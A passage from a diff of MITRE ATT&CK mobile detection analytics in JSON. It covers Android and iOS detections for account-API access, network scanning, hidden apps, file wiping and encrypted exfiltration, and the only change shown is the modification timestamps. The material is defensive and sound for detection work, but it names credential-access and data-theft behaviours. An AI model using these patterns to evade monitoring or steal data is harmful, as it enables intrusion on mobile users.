+                            "description": "Suppress alerts shortly after legitimate network transitions (Wi-Fi join, VPN connect) to reduce noise."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2026-02-18 19:59:27.650000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--6bd50b74-5852-4800-b459-1c54d95348e3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0635#AN1708",
+                            "external_id": "AN1708"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1708",
+                    "description": "OLD: Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS.\nApplication vetting services may look for `MANAGE_ACCOUNTS` in an Android application\u2019s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.\n\nNEW: A defender observes an Android application invoking the AccountManager API.  ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "Invocation of AccountManager.getAccounts()"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-03-23 23:00:36.132000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--98dfbd23-232b-410a-bb71-25ba191ff746",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0636#AN1710",
+                            "external_id": "AN1710"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1710",
+                    "description": "Defender observes an app (package/UID) repeatedly querying device networking context APIs (Wi-Fi scan results/current SSID/BSSID, Bluetooth device discovery, or cellular tower lists) at a rate or timing inconsistent with the app\u2019s normal UX, often while backgrounded. Correlate API calls with permission usage (fine location, nearby devices/Bluetooth) and concurrent connectivity probes (DNS lookups/ARP/port reachability) to distinguish automated discovery from user-initiated settings checks. The detection is based on observed API execution + permission use + rate/sequence, not the specific API method name.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "android:appops",
+                            "channel": "ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "wifiservice startScan / scanResults retrieved repeatedly or by unexpected package"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "telephony cell info enumeration bursts (neighboring/all cell info) by package"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window to link scan/enumeration API usage with subsequent probes (e.g., 30\u2013300s)."
+                        },
+                        {
+                            "field": "MinScanCalls",
+                            "description": "Minimum number of scan/enumeration calls per window before flagging (e.g., \u22653 Wi-Fi scans / 5 min)."
+                        },
+                        {
+                            "field": "MinUniqueTargets",
+                            "description": "For Bluetooth/cell, minimum unique devices/towers observed per window (helps avoid single-device noise)."
+                        },
+                        {
+                            "field": "BackgroundOnly",
+                            "description": "Require app to be backgrounded during discovery to suppress legitimate UI-driven network selection."
+                        },
+                        {
+                            "field": "AllowlistedPackages",
+                            "description": "Packages expected to scan (system settings, Wi-Fi managers, MDM, enterprise connectivity tools)."
+                        },
+                        {
+                            "field": "LocationPermissionRequired",
+                            "description": "If true, require AppOps noteOp for fine location/nearby devices to reduce false positives."
+                        },
+                        {
+                            "field": "LocalProbeCIDRs",
+                            "description": "CIDR ranges considered 'local discovery' targets (e.g., 192.168.0.0/16, 10.0.0.0/8)."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-02-18 19:46:01.796000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--2df1959e-8ec4-4193-9cb8-c089c78b4d1c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0637#AN1711",
+                            "external_id": "AN1711"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1711",
+                    "description": "The defender correlates foreground service start or promotion activity with persistent-notification presentation, long-lived application execution, and continued access to while-in-use sensors or network activity outside expected user-driven context. The analytic looks for an application invoking foreground service APIs, sustaining a foreground state longer than expected for its declared role, and retaining camera, microphone, location, or other sensor access while the device is locked, the app lacks recent interaction, or the notification identity/function does not match the application\u2019s behavior.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Persistent foreground-service notification is created, updated, or remains visible while app behavior or notification identity is inconsistent with declared function during the persistence interval"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Foreground service continues accessing camera, microphone, location, or other while-in-use sensors after service promotion and outside recent user interaction"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to run foreground services such as navigation, fitness, calling, media playback, enterprise VPN, accessibility, or device-management apps"
+                        },
+                        {
+                            "field": "AllowedServiceTypes",
+                            "description": "Approved foreground service types and role-to-type mappings, especially for Android 14+ and later"
+                        },
+                        {
+                            "field": "ForegroundDurationThreshold",
+                            "description": "Duration a foreground service may legitimately remain active before suspicion increases"
+                        },
+                        {
+                            "field": "SensorAfterPromotionWindow",
+                            "description": "Maximum expected delay between service promotion and sensor activation for legitimate workflows"
+                        },
+                        {
+                            "field": "NotificationMismatchPatterns",
+                            "description": "Patterns indicating misleading or impersonating foreground notifications, such as benign-looking text or mismatched app function"
+                        },
+                        {
+                            "field": "RecentInteractionThreshold",
+                            "description": "How recently the user must have interacted with the app for sensor or network activity to be considered expected"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum sustained outbound volume or beacon frequency during persistent foreground execution"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-08 20:14:18.733000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f6be418e-3fed-4026-b665-f055465c7359",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0638#AN1712",
+                            "external_id": "AN1712"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1712",
+                    "description": "Correlates (1) application access to or staging of local files likely to be of operational, evidentiary, or user value, (2) deletion of those files or wipe-like destructive actions through ordinary storage access, administrative controls, or privileged/rooted paths, and (3) continued app or device activity after deletion, including cleanup, concealment, or outbound transfer. The defender observes a causal chain where files are first accessed or prepared, then removed, and device-side behavior continues after evidence or data is gone.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application holds device administrator, device owner, or other managed authority capable of wipe or destructive device-level action before bulk file loss or wipe event"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "device posture indicates rooted, compromised, or non-compliant state before protected or atypical filesystem deletion activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between file access or staging, deletion event, and subsequent activity"
+                        },
+                        {
+                            "field": "FileScopeSet",
+                            "description": "File paths, storage scopes, and data classes monitored for suspicious deletion, such as documents, databases, media, email stores, or update artifacts"
+                        },
+                        {
+                            "field": "DeletionVolumeThreshold",
+                            "description": "Threshold for number, size, or concentration of deleted files required before escalation"
+                        },
+                        {
+                            "field": "AllowedCleanupApps",
+                            "description": "Legitimate applications expected to rotate, purge, or clean up files in the environment"
+                        },
+                        {
+                            "field": "ProtectedRoleSet",
+                            "description": "Administrative or rooted control paths that materially increase destructive file deletion capability"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Outbound traffic threshold used to distinguish exfiltration-linked cleanup from benign maintenance activity"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2026-04-24 20:30:39.616000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--bfbe9c72-f373-4d03-a08a-1448f31dd92f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0639#AN1713",
+                            "external_id": "AN1713"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1713",
+                    "description": "Defender correlates an Android-specific causal chain where device connectivity degrades or oscillates across one or more radios, applications lose or repeatedly reattempt network access, and the radio or network failure pattern is inconsistent with ordinary mobility, coverage transition, or user-initiated airplane mode behavior. The defender correlates radio state, connectivity framework behavior, application state, network session failures, and location/network-provider degradation to distinguish network denial effects from routine weak-signal conditions.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "android:MDMLog",
+                            "channel": "No user-initiated airplane mode, radio disablement, or managed network setting change occurred during repeated connectivity degradation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "android:MDMLog",
+                            "channel": "Managed Wi-Fi, VPN, cellular, or location-related policy state remains unchanged while network capability degrades"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Foreground or background applications remain active while network-dependent activity stalls, retries, or transitions into repeated failure state"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App with network-, telephony-, Wi-Fi-, or location-adjacent capability is impacted by abrupt repeated service loss while permissions remain unchanged"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum span for correlating connectivity degradation, application retry behavior, and network-session failure into a single denial event."
+                        },
+                        {
+                            "field": "ExpectedMobilityPopulation",
+                            "description": "Users or device populations expected to move through low-coverage zones or transit environments that naturally cause network oscillation."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps expected to generate frequent retry behavior or maintain persistent sessions under ordinary weak-signal conditions."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether impacted applications are expected to be actively visible to the user for the analytic to carry high confidence."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Time threshold for determining whether connectivity degradation occurred during active device use versus idle background operation."
+                        },
+                        {
+                            "field": "FailureBurstThreshold",
+                            "description": "Threshold for repeated disconnects, resets, DNS failures, or transport failures within the correlation window."
+                        },
+                        {
+                            "field": "LocationProviderDependencyList",
+                            "description": "Apps or services expected to rely on GPS or network-based location and therefore likely to exhibit secondary degradation during jamming."
+                        },
+                        {
+                            "field": "ExpectedCoverageZones",
+                            "description": "Known sites or geographies with weak legitimate coverage that should be baseline-adjusted."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-11 16:29:42.519000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--1e8d1470-1e76-4f6f-b2c9-633800c4478a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0639#AN1714",
+                            "external_id": "AN1714"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1714",
+                    "description": "Defender correlates an iOS-specific reduced-confidence chain where a managed or supervised device remains active but experiences abrupt loss of network-dependent functionality, repeated session failure, or sustained communication inability without matching configuration changes or ordinary user action. Because direct radio-layer and RF-cause visibility is weaker on iOS, the defender emphasizes device posture, application wake or foreground behavior during service loss, protected network-policy stability, and downstream failure patterns observed in VPN or proxy telemetry.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed Wi-Fi, VPN, cellular, or location-service policy remains unchanged while device connectivity repeatedly degrades"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "iOS:MDMLog",
+                            "channel": "No user-initiated airplane mode or radio-related setting change occurred while applications experience repeated network unavailability"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Foreground or background applications remain active while network-dependent activity stalls, retries, or transitions into repeated failure state"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Network- or location-dependent app capability state remains unchanged while the app experiences sustained communication failure"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum span for correlating app activity, posture stability, and repeated network failure into a single denial event."
+                        },
+                        {
+                            "field": "SupervisedOnly",
+                            "description": "Whether the analytic should only apply to supervised devices with high-confidence MDM policy telemetry."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps expected to retry aggressively or queue offline work during routine coverage degradation."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether the app should be foreground or recently active for the analytic to be treated as high confidence."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Time threshold for determining whether the denial occurred during active user use versus background idle periods."
+                        },
+                        {
+                            "field": "FailureBurstThreshold",
+                            "description": "Threshold for repeated session failures, resets, timeouts, or DNS failures within the correlation window."
+                        },
+                        {
+                            "field": "ExpectedCoverageZones",
+                            "description": "Known sites or geographies where benign poor service should be baseline-adjusted."
+                        },
+                        {
+                            "field": "TrustedDestinationAllowList",
+                            "description": "Expected enterprise destinations whose temporary maintenance or outage should not be treated as device-targeted denial."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-03-12 17:09:47.656000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--964fc2e0-96fc-4992-b89a-8101d47b7d8c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0640#AN1715",
+                            "external_id": "AN1715"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1715",
+                    "description": "Correlates (1) changes to application visibility or user-facing presence such as launcher component disablement, icon suppression, or reduced discoverability, (2) continued application execution or privileged framework activity after that visibility reduction, and (3) follow-on behavior such as background network communication, sensor access, or persistence-related state transitions. The defender observes a causal chain where an application becomes less visible to the user while retaining or increasing operational activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "managed app inventory or launcher-visible state changes show application remains installed but user-facing entry point or launcher component becomes disabled before later runtime activity"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between visibility suppression and later hidden execution or network activity"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Baseline of legitimate apps allowed to hide launcher presence or disable user-facing components"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether post-hide activity is only suspicious when no foreground interaction occurs"
+                        },
+                        {
+                            "field": "HiddenComponentThreshold",
+                            "description": "Threshold for number or type of launcher-visible components disabled before raising suspicion"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound traffic volume used to distinguish meaningful hidden operation from benign background telemetry"
+                        },
+                        {
+                            "field": "SensorAfterHideThreshold",
+                            "description": "Threshold for sensor access frequency after visibility suppression"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-04-13 19:26:01.974000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f3068304-de28-4efa-96a5-a360fc7ffc97",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0641#AN1716",
+                            "external_id": "AN1716"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1716",
+                    "description": "An application performs explicit cryptographic operations (e.g., symmetric/asymmetric encryption routines) on locally collected or generated data, followed by structured outbound network communication that does not align with expected application behavior, particularly when occurring in the background or without user interaction. Detection correlates crypto API usage + data staging + application state + network transmission patterns.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Crypto + data staging occurs while app_state=background OR device_locked=true OR no recent user interaction"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Time correlation between crypto operation and outbound network transmission"
+                        },
+                        {
+                            "field": "EntropyThreshold",
+                            "description": "Threshold for detecting encoded/encrypted payloads based on entropy scoring"
+                        },
+                        {
+                            "field": "AllowedCryptoApps",
+                            "description": "Apps expected to perform encryption (e.g., VPNs, messaging apps)"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether encryption + transmission should only occur during user interaction"
+                        },
+                        {
+                            "field": "BeaconIntervalVariance",
+                            "description": "Expected jitter/interval for legitimate app traffic vs beaconing patterns"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-01 15:33:34.145000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--369938c8-6b9e-4eb3-8105-eb76a373dc35",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0641#AN1717",
+                            "external_id": "AN1717"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1717",
+                    "description": "Indirect evidence of application-layer encrypted channel usage inferred through anomalous background processing and network transmission patterns following application activity, where encryption operations are not directly observable. Detection correlates background execution + network behavior + application entitlement posture to identify misuse of encrypted communication channels.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between background processing and network transmission"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps expected to use encrypted communication channels"
+                        },
+                        {
+                            "field": "EntropyThreshold",
+                            "description": "Threshold for identifying encoded/encrypted payloads"
+                        },
+                        {
+                            "field": "BeaconIntervalVariance",
+                            "description": "Tolerance for periodic communication patterns"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
